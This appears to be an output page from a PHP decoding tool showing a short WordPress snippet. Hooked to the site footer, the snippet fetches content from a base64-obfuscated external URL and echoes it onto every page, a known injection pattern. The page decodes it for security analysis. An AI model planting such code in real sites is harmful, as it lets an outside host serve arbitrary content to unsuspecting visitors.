Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php function custom_footer_text() { $r = file_get_contents(base64_decode('aHR0cHM6Ly9k..

Decoded Output download

<?php 
function custom_footer_text() { 
$r = file_get_contents(base64_decode('aHR0cHM6Ly9kdWRhZy5jb20vZVhSeUk='), false, stream_context_create([ 'http' => ['timeout' => 2]])); echo ($r) ? $r : ''; 
} 
add_action('wp_footer', 'custom_footer_text'); ?>

Did this file decode correctly?

Original Code

<?php
function custom_footer_text() {
$r = file_get_contents(base64_decode('aHR0cHM6Ly9kdWRhZy5jb20vZVhSeUk='), false, stream_context_create([ 'http' => ['timeout' => 2]])); echo ($r) ? $r : '';
}
add_action('wp_footer', 'custom_footer_text');

Function Calls

None

Variables

None

Stats

MD5 c0c67d23241f9bc631fcac220cb86551
Eval Count 0
Decode Time 38 ms